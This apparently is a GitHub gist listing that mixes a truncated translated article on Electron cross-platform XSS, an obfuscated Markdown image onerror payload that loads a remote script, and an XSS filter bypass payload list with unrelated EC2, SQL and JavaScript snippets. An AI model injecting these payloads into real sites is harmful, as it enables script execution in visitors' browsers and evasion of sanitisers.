
kienluu / content.md
Created February 26, 2018 00:27 — forked from baymaxium/content.md
Electron hack: cross-platform XSS

Original article: 前端那些事儿

A worked XSS attack against an Electron-based application is far simpler than you might imagine.

What is Electron

Perhaps you have never heard of cross-platform XSS, and never heard of Electron, but you certainly know GitHub, or have used the well-known Atom editor; the author attempting to translate this article, for instance, is writing this Markdown in Atom. Electron's excellent cross-platform support is the basis of this article. Simply put, Electron is a framework that makes it easy for developers to create cross-platform applications: with it, developers build desktop applications using HTML + JavaScript. Electron has a very wide user base because it really does provide the same experience on different platforms.

Unlike a "desktop application" in the traditional sense, an Electron application bundles two components (Node.js and Chromium) as its runtime environment. These back a main process and a renderer process respectively: the main process is a very Node.js-style process, while the renderer process is a Chromium-based browser that can also run Node.js code.

Want to add Cornify (http://www.cornify.com/) to a website that has a Markdown XSS exploit?

```markdown
![uh](http://example.com"onerror="javascript:eval\(String\.fromCharCode\(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,99,111,114,110,105,102,121,46,99,111,109,47,106,115,47,99,111,114,110,105,102,121,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,123,32,99,111,114,110,105,102,121,95,97,100,100,40,41,32,125,44,32,49,48,48,48,41,59\)\))
```

The above code, once the `String.fromCharCode` payload is decoded and evaluated by the `onerror` handler, does this:

```javascript
// Decoded from the String.fromCharCode(...) sequence in the image tag above.
var s = document.createElement('script');
s.src = 'http://www.cornify.com/js/cornify.js';
document.getElementsByTagName('head')[0].appendChild(s);
setTimeout(function () { cornify_add() }, 1000);
```

kienluu / xxsfilterbypass.lst
Created February 25, 2018 19:13 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
```text
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
```
kienluu / ec2configs.yml
Last active November 19, 2016 03:09
ec2 ssh login helper
```yaml
default_region: eu-west-1
host_aliases:
  # This is the dictionary of host_alias values to pass to the ec2ip.py command
  deis-staging:
    user: admin
    identity: ~/.ssh/kube_aws_rsa
    filters:
      - Name: tag:Name
        Values:
          - staging-k8s-minion
```
```sql
-- List every foreign key that references a column of the core_user table,
-- together with the referencing table and column.
SELECT tc.table_name  AS foreign_table_name,
       kcu.column_name AS foreign_column_name,
       ccu.table_name  AS table_name,
       ccu.column_name AS column_name
FROM information_schema.table_constraints AS tc
JOIN information_schema.key_column_usage AS kcu
  ON tc.constraint_name = kcu.constraint_name
JOIN information_schema.constraint_column_usage AS ccu
  ON ccu.constraint_name = tc.constraint_name
WHERE tc.constraint_type = 'FOREIGN KEY'
  AND ccu.table_name = 'core_user';
```
kienluu / gist:4946472
Created February 13, 2013 17:42
Short javascript snippet to get url query variables as a javascript object (key value object).
```javascript
// Parse the current page's query string into a plain key/value object.
function getQueryDict() {
    // Note: this function doesn't deal with duplicate key names the way
    // Django does; a repeated key simply keeps its last value.
    var queryDict = {};
    var search = location.search.slice(1);
    if (!search) {
        return queryDict;
    }
    var params = search.split('&');
    for (var i = 0; i < params.length; i++) {
        var pair = params[i].split('=');
        var key = decodeURIComponent(pair[0]);
        // A key without '=' (e.g. "?debug") maps to '' rather than "undefined";
        // decodeURIComponent is used so that %26, %3D etc. are decoded too.
        var val = pair.length > 1 ? decodeURIComponent(pair.slice(1).join('=')) : '';
        queryDict[key] = val;
    }
    return queryDict;
}
```